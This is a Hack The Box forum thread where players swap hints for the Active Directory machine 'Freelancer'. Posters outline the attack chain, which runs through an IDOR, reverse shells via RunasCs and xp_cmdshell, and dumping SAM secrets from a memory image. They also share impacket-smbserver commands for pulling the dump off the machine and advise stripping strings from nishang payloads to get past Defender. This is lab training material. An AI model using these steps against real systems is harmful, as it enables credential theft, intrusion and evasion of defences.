Official Freelancer Discussion

Why the heck did I get banned?

I had never learned so much in a machine, and precisely the AD knowledge I was after when I turned to HTB to do some Windows machines. Very annoying box but powerful lessons learned. Also, what a great community. Please reach out if you need a pointer; there are so many gotchas in this box it can become crazy slow to progress through it.

1 Like

Can we still play this machine? It says expired.

Yes, you just won't get seasonal points for it. You can still get flag points though.

I want to give a great thanks to all the helpful people here … especially @bsnun for your clues, thanks again …
I spent so much time before I realized that my RunasCs was wrong :person_facepalming:

Here is some help for others:
elevate_to_employer > look at QR code (IDOR attack) > go to admin page > got sql_svc shell > find mi**** creds (use RunasCs.exe) > got user.txt > upload the memory dump and got SAM, S***** > got l*** password (using secretsdump) > whoami /all > search how to abuse this AD group > create computer > add it to the domain controller > impersonate Administrator > got root…

2 Likes

I'm struggling with what to do with the MEMORY.DMP file on Kali; any tips on how to analyse it?

Try to use a tool to mount it in /mnt: MemProcFS… so that you will be able to explore its contents.

RunasCs.exe is not giving me a reverse shell; my netcat listener is getting killed after catching the connection.

Good luck guys, I spent so much time solving it:

Try to redownload your RunasCs; choose the antonioCoco git one, it should give a stable shell…
Also you don't really need to use nc, the -r option of runas can get it… But it's up to you :innocent:
I hope it helps.

tbh I am just looking forward to any official writeup on this machine. I could see that I really suc* at AD and all this stuff about permissions and all those options… I will try to learn more about it. This machine was indeed too much for me right now and my frustration ended up in blaming others… the truth is that the machine was completely pwnable from the start, as has been proved by hundreds of players… I will get there… just not today.

3 Likes

Anyone willing to ELI5 some Impacket syntax (and maybe confirm I'm going about root correctly)?

Can someone tell me how to download the MEMORY.7z file? Tried a lot of methods without success, thank you very much!

Run an SMB server with credentials, and then in PowerShell you run:

impacket-smbserver sharename . -smb2support -username winusername -password validpassword
# map the share with the same credentials first, then copy the file to it
net use \\10.10.10.10\sharename /user:winusername validpassword
Copy-Item memory.7z \\10.10.10.10\sharename\name.7z

Make sure to change the IP to your IP address…

PS: check the parameters for smbserver… I just wrote this reply without checking the correct parameters… but it is something like that:

impacket-smbserver sharename . -smb2support -username winusername -password validpassword

If anyone has trouble getting the reverse shell from xp_cmdshell, I got it with a netcat binary with a different hash from the one on git. The AV is really annoying.

Port 80 should be open, right?

Done several different scan techniques but port 80 stays closed even after resetting the machine and waiting some time.

I was using the EU Free3 VPN back then (Seasonal Machine); it said use Release Arena, but the machine is unreachable when I am connected to it. Same for the Pwnbox as long as it is in the Release Arena network. In EU Free3 it is:

sudo nmap -vv -p 80 10.10.11.5
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-17 14:45 BST
Initiating Ping Scan at 14:45
Scanning 10.10.11.5 [4 ports]
Completed Ping Scan at 14:45, 2.13s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:45
Completed Parallel DNS resolution of 1 host. at 14:45, 0.01s elapsed
Initiating SYN Stealth Scan at 14:45
Scanning 10.10.11.5 [1 port]
Completed SYN Stealth Scan at 14:45, 0.11s elapsed (1 total ports)
Nmap scan report for 10.10.11.5
Host is up, received timestamp-reply ttl 127 (0.092s latency).
Scanned at 2024-06-17 14:45:53 BST for 0s

PORT   STATE  SERVICE REASON
80/tcp closed http    reset ttl 127

I may be wrong, but Release Arena is only for the first week a box is released.

You might be right, and when I check the machine it is listed at EU Free, but for me it doesn't look like they have fixed the issue with port 80 during this time.

Anyone know how to bypass Windows Defender? Every tool is deleted when I try to run it.

I did it by removing suspicious strings from payloads like nishang.